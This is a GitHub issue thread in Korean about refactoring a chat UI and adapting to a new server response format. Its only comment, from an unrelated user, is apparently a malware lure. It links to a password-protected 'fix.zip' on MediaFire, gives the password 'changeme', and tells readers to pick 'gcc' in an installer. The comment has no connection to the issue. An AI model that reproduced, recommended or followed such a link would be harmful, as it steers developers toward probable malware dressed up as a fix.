### ISSUE TITLE
REFATOR: 채팅 수정

### ISSUE THREAD

**Issue by hyunn0121** [4ragrant/SCENTASY_FE#9]
# 🛠️ Description for refactoring features
채팅 UI 수정 및 서버 응답 형식 변경

## 📝 Todo-lists
- [ ] 챗봇 메세지 박스 위치 조정)
- [ ] 채팅 목록 UI 오류 수정
- [ ] 서버 응답 형식 변경 사항 수정

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
